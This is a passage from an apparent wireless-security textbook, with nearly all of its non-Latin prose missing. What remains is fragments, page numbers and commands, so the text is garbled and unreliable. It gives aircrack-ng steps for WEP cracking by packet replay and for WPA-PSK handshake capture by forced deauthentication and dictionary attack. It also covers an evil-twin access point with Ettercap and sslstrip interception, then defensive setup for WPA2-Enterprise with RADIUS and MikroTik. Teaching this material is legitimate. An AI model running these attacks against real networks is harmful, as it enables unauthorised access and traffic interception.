aireplay-ng -3 -b 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 mon0
:
-3 ,
-b 00:14:6C:7E:40:80 - ,
-h 00:0F:B5:88:AC:82 - .
ARP
:
Saving ARP requests in replay_arp-0321-191525.cap
You should also start airodump-ng to capture replies.
Read 629399 packets (got 316283 ARP requests), sent 210955
packets...
, airodump-ng
, (
7.8).
107
VII
7.8 : airodump-ng
( 20,000 64-
40,000 128- ) airecrack-ng
WEP :
aircrack-ng -b 00:14:6C:7E:40:80 snimak*.cap
:
-b 00:14:6C:7E:40:80 - ,
snimak*.cap .
(7.9):
7.9 : aircrack-ng
1: 64- WEP
WEP .
64- : password WEP .
.
WEP .
.
108
2: 128- WEP
WEP .
128- : password WEP .
.
WEP .
.
109
110
VIII
WPA/WPA2
.
IEEE 802.11i
.
,
.
VIII
8. WPA/WPA2
8.1
WEP .
IEEE 2001.
.
IEEE 802.11i (WPA230). ,
Wi-Fi ,
, -
WEP . ,
IEEE .
WEP
. 2003. Wi-Fi WPA ,
2004. IEEE 802.11i , WPA2.
WPA WPA2 . WPA RC4
, WPA2 AES . WPA RC4
WEP. RC4
, WPA
WEP .
8.2 WPA/WPA2
WPA-PSK WPA2-PSK
WEP , WPA/WPA2 .
PMK33 256 . WPA-PSK WPA2-PSK, PMK
(PSK) (
8 63 ACSII ).
112
8.1 : WPA/WPA2
PMK,
(PTK34). ,
.
PTK :
PMK,
(A-nonce),
34
Pairwise transient key
113
VIII
(S-nonce),
MAC ,
MAC .
PTK
e .
MIC35
. MIC hash
.
PMK PTK ,
PTK hash .
PMK.
WPA-PSK WPA2-PSK
.
. -
hash PMK. ,
WPA WPA2
.
8.1 PMK (PSK) 4096
hash . 4096 hash
.
, .
8.1 PMK PSK,
SSID . PMK
PSK, SSID PMK .
WPA WPA2 . WPA WPA2
PMK . MIC
.
.
.
aircrack-ng PSK.
aircrack-ng A-nonce S-nonce MIC.
MIC MIC
, PSK .
35
Message Integrity Protocol
114
:
airodump-ng
WPA-PSK/WPA2-PSK ,
;
aireplay-ng
.
,
.
aircrack-ng
hash .
:
:
airmon-ng start wlan0
airodump-ng
WPA-PSK/WP2-PSK :
airodump-ng mon0
8.2 : WPA-PSK/WP2-PSK
:
airodump-ng -c 9 --bssid 00:14:6C:7E:40:80 w psk_snimak mon0
:
-c 9 ,
115
VIII
--bssid 00:14:6C:7E:40:80 ,
w psk_snimak .
aireplay-ng .
:
aireplay-ng -0 1 -a 00:14:6C:7E:40:80 -c 00:0F:B5:88:AC:82 mon0
:
-0 ,
-a 00:14:6C:7E:40:80 - ,
-c 00:0F:B5:88:AC:82 - .
airodump-ng
( 8.3), airecrack-ng :
aircrack-ng -w /pentest/passwords/jtr/password.lst -b 00:14:6C:7E:40:80 psk_snimak*.cap
:
-b 00:14:6C:7E:40:80 - ,
psk_snimak*.cap .
-w /pentest/passwords/jtr/password.lst -.
8.3 :
8.4.
116
8.4 : aircrack-ng
1: WPA
WPA-PSK .
: password PMK .
.
WPA-PSK .
.
8.4 WPA-PSK/WPA2-PSK
WPA/WPA2
IV .
Windows WPA/WPA2
:
1. (Control panel)
.
2. (Properties).
117
VIII
8.5 :
5. ( 8.5)
(Add).
6. SSID, PSK (
8.6)
118
8.6 :
Linux WPA/WPA2
:
1. (. nano) wpa_supplicant.conf ,
:
ctrl_interface=/var/run/wpa_supplicant
ctrl_interface_group=0
eapol_version=1
ap_scan=1
fast_reauth=1
network={
ssid=" ESSID" >>
proto=WPA
key_mgmt=WPA-PSK
pairwise=TKIP
psk="" >>
}
2. WPA :
wpa_supplicant -i wlan0 -c wpa_supplicant.conf
119
IX
, .
Linux .
,
.
IX
9.
9.1
.
Linux .
9.1 :
( 9.1). .
9.2
:
1. DHCP ,
2. ,
3. .
DHCP /etc/dhcp3/dhcpd.conf.
dhcpd.conf .
.
mv /etc/dhcp3/dhcpd.conf /etc/dhcp3/dhcpd.conf.bkp
nano /etc/dhcp3/dhcpd.conf
ddns-update-style ad-hoc;
default-lease-time 600;
max-lease-time 7200;
subnet 10.0.0.0 netmask 255.255.255.0 {
option subnet-mask 255.255.255.0;
option broadcast-address 10.0.0.255;
option routers 10.0.0.1;
option domain-name-servers 8.8.8.8;
range 10.0.0.100 10.0.0.150;
}
mkdir p /var/run/dhcpd && chown dhcpd:dhcpd /var/run/dhcpd
122
Airbase-ng
. .
irbase-ng ( at0),
.
airmon-ng start wlan0
9.3
.
. CUDA
,
.
, 36.
36 Man-in-the-middle
123
IX
. 9.2.
9.2 :
. (Evil twin),
SSID- .
,
.
,
.
,
.
.
,
SSL .
(https )
Ettercap SSL .
, 76%
, Ettercap SSL
.
SSL .
:
Ettercap ;
Sslstrip HTTPS ;
Driftnet TCP ;
124
9.3 :
1:
.
,
.
2:
,
.
125
126
X
.
RADIUS
.
127
X
10.
10.1
SOHO
(PSK) .
WPA-PSK WPA2-PSK .
, , . WPA-Enterprise
WPA2-Enterprise .
.
. ,
.
(
, LDAP, SQL .)
( ).
WPA-Enterprise WPA2--Enterprise
IEEE 802.1 EAP37. IEEE 802.1X
.
.
,
.
:
, .
(NAS38),
(
802.1x ).
,
.
.
.
, . ,
. 802.1X
.
.
802.1X SOHO .
RADIUS
128
,
.
EAP .
. ,
. RADIUS39
IP . WPA
RADIUS , (. DIAMETER,
TACAS+, .).
, EAP
, RADIUS .
( 10.1).
10.1 : 802.1X
, EAP :
EAP-PEAP40 - MSCHAPv241
. MSCHAPv2
129
X
NT hash . PEAP-
Windows
.
EAP-TTLS42- PAP43, CHAP44 MSCHAPv2
. Linux Apple
Mac , Windows
.
PKI45
(
)
.
.
(anonymous), , ,
,
. RADIUS ,
(
CA46) .
. ,
( )
( 10.2).
,
.
10.2 :
130
10.2 WPA/WPA2-Enterprise
.
.
.
. start
dcpromo.
.
Create new
domain in a new forest. Next.
131
X
10.3 :
. bkslab.edu.rs.
Next.
132
10.4 :
.
Password2 .
. , Finish .
. ,
Password3 .
.
(OU - rganiztion unit).
Start>Administrative Tools>Active Directry Users and Computers.
.
(bkslab.edu.rs) New-Ogranization Unit.
.
133
X
10.5 :
OU . Wireless
. OU , New-User.
10.6 :
134
. OU , New-Group.
Wireless. .
. Add to group
Wireless.
10.7 :
PEAP .
()
.
.
(Initial Configuration Tasks)
Add roles47. Active Directory Certificate Services Next.
135
X
10.8 :
Enterprise
Next.
10.9 :
136
:
Root CA ,
(Create a new private key),
.
, (
10.10).
10.10 :
,
.
Install.
PEAP . Microsoft (): Start >
MM > Enter. MMC : File > Add/Remove Snap-in.
Certificates ( 10.11), Add.
137
X
10.11 : MMC
10.12 : MMC
138
10.13 :
RADIUS
139
X
( 10.15):
Network Policy Server,
Routing and Remote Access Servers,
Remote Access Services,
Routing.
140
10.15 :
RADIUS
. e Start > nps.ms > Enter.
RADIUS server for 802.1X Wireless or Wired Connections (
10.16).
141
X
10.16 : RADIUS
IP Address: 192.168.1.1 (
)
RADIUS RADIUS
.
142
10.17 : RADIUS
Microsoft:
Protected EAP (PEAP),
Wireless.
NPS .
RSDIUS .
Wireless Security ( 10.18):
WPA/WPA2,
o Version: WPA2,
o Encryption: AES,
o IP RADIUS , RADIUS
(Password12345).
(SSID, ,
, ...).
143
X
10.18 :
CA
.
. MMC , Certificates (Local
Computer Account) > Personal, Certificates.
, All Tasks > Export ( 10.19).
144
10.19 :
a ,
DER.
.
( 10.20),
(Trusted Root Certificate
Authorities). .
WPA2-Enterprise .
145
X
10.20 :
. Windows 7
SSID . Properties.
(Security Windows Vista Windows 7, Advanced
Windows XP) WPA2-Enterprise ,
AES ( 10.21). Windows XP
Enable IEEE 802.1x authentication for this network.
146
10.21 :
147
X
10.22 : PEAP
.
,
, :
Username: mristic
Password: Password2
1: WPA2-Enterprise
WPA2-Enterprise .
,
RADIUS . RADIUS .
148
XI
MikroTik RouterOS
MikroTik .
.
.
149
XI
RouterOS
. MikroTik Linux-.
Linux-, MikroTik .
SOHO .
.
.
, MikroTik x86 .
( ).
, x86 (
, , , ).
RouterBoard ( 11.1) . RouterBoard
MIPS (RISC)
.
x86
(L2PT VPN, IPSec VPN, 1Gbps..).
.
11.2 MikroTik
MikroTik :
150
(SSH/Telnet),
Winbox ( , ),
Web stranice ( ).
CLI49 o ,
Winbox (.
DLL Winbox ).
Winbox ,
.
.
Winbox OSI
. IP
.
Winbox .
1 11.2.
192.168.88.1.
11.2 :
OSI
MAC . admin,
. Connect ( 2 11.2) .
151
XI
11.3 MikroTik
. 11.3 .
11.3 :
:
LAN 88.88.88.2/20,
BksMT,
- WPA2,
IP
192.168.50.0/24,
,
1Mbs.
IP IP>Addresses.
, Address List,
Address ( 11.4).
.
152
11.4 : IP
Address List (
)
.
- 192.168.50.1/24
( 11.5).
153
XI
11.5 :
IP
(W Wireless>Seccurity Profilles>Add - ).
11.6.
154
11.6 :
W WPA2-profil
.
.
Wirelesss>Interfacess ,
( wlaan1). 11.7
.
aap-bridge ,, .
155
XI
11..7 :
D DHCP
. DHCP
IP>DHCP P Server>D DHCP Setup.. wlan 1
DHCP . 192.168.50.0//24
, ( wlan1 -
192.168..50.1) .
192.168.50.2-1192.168.50.100. DNS
. 11.8 DHCP .
156
11.8 : DHCP
(NAT). 192.168.50.0/24
ether1 . NAT
IP>Firewall>NAT.
General ( 11.9):
chain: SRCNAT,
: 192.168.50.0./24
: 0.0.0.0/0 ( ),
: ether1.
Action NAT-a MASQUERADE.
.
157
XI
11.9 :
MikroTik .
1Mbs
.
MikroTik ,
.
.
1Mbs:
/queue simple add name="1M-korisnici" dst-
address=192.168.50.0/24 interface=ether1 direction=both
priority=8 queue=default/default limit-at=1000000/1000000 max-
limit=1000000/1000000 disabled=no
:
name - ,
dst-address - (
);
interface - . Ether1
. ,
;
direction - (
). MikroTik ;
158
priority - .
. ,
;
queue - ;
limit-at - . .
, / (upload/download);
max-limit - .
;
disable - .
1: MikroTik
MiktoTik .
159
[1] . , , , ,
2008.
[2] W. Stallings, Wireless Communications & Networks, Prentice Hall, 2004.
[3] J. Schiller, Mobile Communications, Addison-Wesley, 2003.
[4] W. Osterhage, Wireless Security, Science Publisher, Jersey, 2012.
[5] R. Bartz, CWTS: Certified Wireless Technology Specialist Official Study Guide, John Wiley&Sons,
Indianopolis, 2012.
[6] T. Wrightson, Wireless Network Security A Beginner's Guide, McGraw-Hill, New York, 2012.
[7] Angela Orebaugh, Gilbert Ramirez, Jay Beale, Joshua Wright, Wireshark & Ethereal Network
Protocol Analyzer Toolkit, Syngress, 2007.
[8] http://www.ve2dbe.com
[9] http://www.backtrack-linux.org
[10] http://www.aircrack-ng.org
[11] http://technet.microsoft.com
160
II
III
IV
VI
VII
VIII
IX
XI
161